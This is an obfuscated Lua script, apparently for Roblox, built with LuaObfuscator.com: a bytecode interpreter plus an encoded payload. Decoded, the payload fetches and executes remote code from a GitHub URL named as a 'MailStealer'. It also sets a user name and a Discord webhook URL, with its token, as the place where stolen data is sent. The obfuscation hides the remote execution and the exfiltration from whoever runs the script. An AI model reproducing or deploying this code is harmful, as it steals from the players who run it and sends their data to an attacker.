--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v69=0 -0 ;local v70;while true do if (v69==(0 -0)) then v70=(v31/(((3 -0) -1)^(v32-1)))%((4 -2)^(((v33-(620 -(555 + (1334 -(226 + 1044))))) -(v32-((1997 -(68 + 997)) -(857 + 74)))) + 1)) ;return v70-(v70%(569 -(367 + 201))) ;end end else local v71=927 -((931 -717) + (830 -(32 + 85))) ;local v72;while true do if ((0 + 0 + 0)==v71) then v72=(1 + 1)^(v32-(878 -(63 + 219 + 595))) ;return (((v31%(v72 + v72))>=v72) and (1638 -(1523 + 114))) or ((957 -(892 + 65)) + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (7 -4) );v19=v19 + (6 -(182 -(67 + 113))) ;return (v37 * 16777216) + (v36 * (120312 -54776)) + (v35 * (606 -(87 + 263))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38~=(7 -5)) then else v43=nil;v44=nil;v38=3 + 0 ;end if (v38~=3) then else v45=nil;v46=nil;v38=655 -(494 + 157) ;end if (v38~=0) then else v39=0 -0 ;v40=nil;v38=1 + 0 ;end if (v38==4) then while true do if (v39==1) then local v97=0;while true do if (v97==(1 + 0)) then v39=2;break;end if (v97==(0 + 0)) then v42=nil;v43=nil;v97=837 -(660 + 176) ;end end end if (v39~=(1 + 2)) then else v46=nil;while true do if (v40==(203 -(14 + 188))) then v44={v41,v42,nil,v43};v45=v24();v46={};v40=2;end if (v40~=(0 + 0)) then else v41={};v42={};v43={};v40=1 + 0 ;end if (v40==(2 + 0)) then local v106=0;while true do if (v106~=1) then else for v110=1 -0 ,v24() do local v111=0 -0 ;local v112;local v113;local v114;while true do if (v111==(2 -1)) then v114=nil;while true do if (v112~=0) then else v113=0;v114=nil;v112=1 + 0 ;end if (v112==(1 + 0)) then while true do if (v113==0) then v114=v22();if (v21(v114,397 -(115 + 281) ,2 -1 )==(0 + 0)) then local v176=0;local v177;local v178;local v179;local v180;while true do if (2==v176) then while true do if (v177==0) then local v183=0 -0 ;local v184;while true do if (v183~=(0 -0)) then else v184=867 -(550 + 317) ;while true do if (0==v184) then v178=v21(v114,2,3 -0 );v179=v21(v114,4,8 -2 );v184=2 -1 ;end if (1==v184) then v177=1;break;end end break;end end end if (v177~=(288 -(134 + 151))) then else if (v21(v179,1668 -(970 + 695) ,3)~=(1 -0)) then else v180[1994 -(582 + 1408) ]=v46[v180[4]];end v41[v110]=v180;break;end if (v177==(6 -4)) then local v186=0;local v187;local v188;while true do if ((0 -0)==v186) then v187=0;v188=nil;v186=3 -2 ;end if ((1825 -(1195 + 629))~=v186) then else while true do if (v187==(0 -0)) then v188=241 -(187 + 54) ;while true do if (v188==0) then local v194=0;while true do if (v194==1) then v188=781 -(162 + 618) ;break;end if (v194==(0 + 0)) then if (v21(v179,1 + 0 ,1)==(1 -0)) then v180[2]=v46[v180[2 -0 ]];end if (v21(v179,2,2)==(1 + 0)) then v180[3]=v46[v180[3]];end v194=1;end end end if (v188==1) then v177=1639 -(1373 + 263) ;break;end end break;end end break;end end end if (v177==1) then local v189=1000 -(451 + 549) ;local v190;while true do if ((0 + 0)~=v189) then else v190=0 -0 ;while true do if (v190~=1) then else v177=2 -0 ;break;end if (v190~=0) then else local v193=0;while true do if (v193==0) then v180={v23(),v23(),nil,nil};if (v178==0) then local v195=0;local v196;local v197;while true do if (v195==(341 -(218 + 123))) then v196=1581 -(1535 + 46) ;v197=nil;v195=1 + 0 ;end if (v195~=(1 + 0)) then else while true do if ((560 -(306 + 254))~=v196) then else v197=0 + 0 ;while true do if ((0 -0)==v197) then v180[1470 -(899 + 568) ]=v23();v180[4]=v23();break;end end break;end end break;end end elseif (v178==1) then v180[3]=v24();elseif (v178==2) then v180[2 + 1 ]=v24() -(2^(38 -22)) ;elseif (v178~=3) then else local v204=603 -(268 + 335) ;local v205;local v206;local v207;while true do if (v204==1) then v207=nil;while true do if (v205~=1) then else while true do if (v206==(290 -(60 + 230))) then v207=0;while true do if (v207~=(572 -(426 + 146))) then else v180[3]=v24() -(2^(2 + 14)) ;v180[4]=v23();break;end end break;end end break;end if (v205==0) then v206=1456 -(282 + 1174) ;v207=nil;v205=1;end end break;end if (v204~=0) then else v205=811 -(569 + 242) ;v206=nil;v204=2 -1 ;end end end v193=1;end if (v193==(1 + 0)) then v190=1025 -(706 + 318) ;break;end end end end break;end end end end break;end if (v176==0) then local v181=1251 -(721 + 530) ;while true do if (1~=v181) then else v176=1272 -(945 + 326) ;break;end if (v181~=0) then else v177=0;v178=nil;v181=2 -1 ;end end end if ((1 + 0)==v176) then local v182=0;while true do if (v182==(700 -(271 + 429))) then v179=nil;v180=nil;v182=1;end if (v182==1) then v176=2;break;end end end end end break;end end break;end end break;end if (v111~=0) then else v112=0;v113=nil;v111=1 + 0 ;end end end v40=1503 -(1408 + 92) ;break;end if (v106==(1086 -(461 + 625))) then for v115=1,v45 do local v116=1288 -(993 + 295) ;local v117;local v118;while true do if (v116==(0 + 0)) then local v154=1171 -(418 + 753) ;local v155;while true do if ((0 + 0)~=v154) then else v155=0 + 0 ;while true do if (v155==1) then v116=1;break;end if (v155==0) then local v175=0;while true do if (v175~=0) then else v117=v22();v118=nil;v175=1;end if (v175==(1 + 0)) then v155=1;break;end end end end break;end end end if (v116==(1 + 0)) then if (v117==1) then v118=v22()~=0 ;elseif (v117==2) then v118=v25();elseif (v117==3) then v118=v26();end v46[v115]=v118;break;end end end v44[532 -(406 + 123) ]=v22();v106=1;end end end if (v40==(1772 -(1749 + 20))) then local v107=0 + 0 ;local v108;while true do if (v107==(1322 -(1249 + 73))) then v108=0;while true do if (v108==0) then for v157=1,v24() do v42[v157-1 ]=v29();end return v44;end end break;end end end end break;end if (v39==(1 + 1)) then local v98=0;while true do if (v98==0) then v44=nil;v45=nil;v98=1146 -(466 + 679) ;end if (1==v98) then v39=3;break;end end end if (v39~=0) then else local v99=0 -0 ;while true do if (v99~=0) then else v40=0 -0 ;v41=nil;v99=1901 -(106 + 1794) ;end if (v99~=(1 + 0)) then else v39=1;break;end end end end break;end if (v38==1) then v41=nil;v42=nil;v38=2;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 + 0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v47==(2 -1)) then v50=2 -(978 -(553 + 424)) ;v51=(v21(v49,1 + 0 ,134 -((7 -3) + 110) ) * ((586 -(57 + 527))^(1459 -(41 + (4056 -2670))))) + v48 ;v47=984 -(18 + 964) ;end if (v47==(105 -(17 + 86))) then v52=v21(v49,78 -57 ,20 + 2 + 9 );v53=((v21(v49,21 + 11 )==((1 + 0) -0)) and  -(1 + 0)) or (2 -1) ;v47=169 -(122 + 44) ;end if (v47==(5 -2)) then if (v52==0) then if (v51==(738 -(542 + (573 -(142 + 235))))) then return v53 * (0 -0) ;else v52=1 + 0 ;v50=0 + (0 -0) ;end elseif (v52==(1041 + 1006)) then return ((v51==(0 + 0 + 0)) and (v53 * ((1 -0)/(65 -(30 + 35))))) or (v53 * NaN) ;end return v8(v53,v52-(704 + 319) ) * (v50 + (v51/((1259 -(1043 + 123 + 91))^(457 -(118 + 287))))) ;end if (v47==((0 + 0) -0)) then v48=v24();v49=v24();v47=1213 -(323 + 889) ;end end end v26=nil;function v26(v54)local v55=0 -0 ;local v56;local v57;while true do if (v55==(2 -1)) then v56=v3(v16,v19,(v19 + v54) -(2 -1) );v19=v19 + v54 ;v55=1 + 1 ;end if (v55==(9 -7)) then v57={};for v78=754 -(239 + 514) , #v56 do v57[v78]=v2(v1(v3(v56,v78,v78)));end v55=3;end if (v55==(2 + 1)) then return v6(v57);end if (v55==0) then v56=nil;if  not v54 then v54=v24();if (v54==0) then return "";end end v55=1330 -(580 + 217 + 180 + 352) ;end end end v18=5;end if (v18==2) then function v22()local v58=v1(v16,v19,v19);v19=v19 + 1 ;return v58;end v23=nil;function v23()local v59,v60=v1(v16,v19,v19 + (4 -2) );v19=v19 + (1204 -(373 + 829)) ;return (v60 * (987 -(476 + 255))) + v59 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then v20=v0(v3(v61,1,1));return "";else local v73=0;local v74;while true do if (v73==0) then v74=v2(v0(v61,16));if v20 then local v100=0;local v101;while true do if (v100==1) then return v101;end if (v100==0) then v101=v5(v74,v20);v20=nil;v100=1;end end else return v74;end break;end end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end if (v65==1) then v68=v62[3];return function(...)local v80=v66;local v81=v67;local v82=v68;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=9) then if (v93<=4) then if (v93<=1) then if (v93>0) then local v119=v92[2];v90[v119]=v90[v119](v13(v90,v119 + 1 ,v85));else v90[v92[2]]=v64[v92[3]];end elseif (v93<=2) then v90[v92[2]]=v92[3];elseif (v93>3) then v90[v92[2]]();else v90[v92[2]]=v64[v92[3]];end elseif (v93<=6) then if (v93>5) then v90[v92[2]]=v92[3];else v84=v92[3];end elseif (v93<=7) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93==8) then v90[v92[2]][v92[3]]=v92[4];elseif (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93<=14) then if (v93<=11) then if (v93>10) then v90[v92[2]]();else local v128=0;local v129;local v130;while true do if (v128==1) then v90[v129 + 1 ]=v130;v90[v129]=v130[v92[4]];break;end if (v128==0) then v129=v92[2];v130=v90[v92[3]];v128=1;end end end elseif (v93<=12) then local v131=0;local v132;while true do if (v131==0) then v132=v92[2];v90[v132]=v90[v132](v13(v90,v132 + 1 ,v85));break;end end elseif (v93==13) then local v145=v92[2];local v146,v147=v83(v90[v145](v13(v90,v145 + 1 ,v92[3])));v85=(v147 + v145) -1 ;local v148=0;for v166=v145,v85 do local v167=0;while true do if (v167==0) then v148=v148 + 1 ;v90[v166]=v146[v148];break;end end end else v84=v92[3];end elseif (v93<=16) then if (v93==15) then v90[v92[2]][v92[3]]=v92[4];else local v135=v92[2];local v136=v90[v92[3]];v90[v135 + 1 ]=v136;v90[v135]=v136[v92[4]];end elseif (v93<=17) then do return;end elseif (v93==18) then do return;end else local v150=v92[2];local v151,v152=v83(v90[v150](v13(v90,v150 + 1 ,v92[3])));v85=(v152 + v150) -1 ;local v153=0;for v168=v150,v85 do local v169=0;while true do if (v169==0) then v153=v153 + 1 ;v90[v168]=v151[v153];break;end end end end v84=v84 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703093O00557365724E616D657903073O006970696E5F703403083O00576562682O6F6B7903793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3130312O36393839333738343230372O362F5F50523544426442713471796A6D39796D706B51437342354A6C646F5737747A31704F6172552D49316336356471686779506A3169663467616F2D312O43527559316C6300143O0012023O00013O0026093O000B0001000200040E3O000B000100122O000100033O00122O000200043O002010000200020005001202000400064O0013000200044O000100013O00022O000400010001000100040E3O001300010026093O00010001000100040E3O0001000100122O000100073O00300F00010008000900122O000100073O00300F0001000A000B0012023O00023O00040E3O000100012O00113O00017O00",v9(),...);end
